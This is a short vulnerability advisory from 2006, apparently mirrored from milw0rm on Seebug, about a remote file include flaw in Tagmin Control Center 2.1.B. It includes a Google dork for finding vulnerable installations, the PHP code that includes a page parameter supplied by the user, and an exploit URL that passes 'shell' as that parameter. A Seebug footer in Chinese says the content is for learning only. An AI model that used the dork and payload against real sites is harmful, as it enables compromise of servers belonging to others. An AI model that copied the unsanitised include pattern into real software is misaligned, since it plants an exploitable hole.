Tagmin C.C 2.1.B Remote File Include ######################################## +Advisory #3 +Product :Tagmin Control Center 2.1.B +Develop: http://ds3.bbminc.net/tagit2b/ +Dork: inurl:"/tagit2b/" +Vulnerable: Remote File Include +Risk:High +Discovered:by Kernel-32 +Contact: kernel-32@linuxmail.org +Homepage: http://kernel-32.blogspot.com +Greetz: BeLa ;) ######################################## Vulnerable code: ---------------- if(isset($_GET['load']) && $_GET['load'] == "dtu" or $_GET['load'] == "tag") { include("$page.php"); } else { include("tagviewer.php"); } ?> --------------- Vulnerable: http://site/path/index.php?page=shell # milw0rm.com [2006-09-28]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论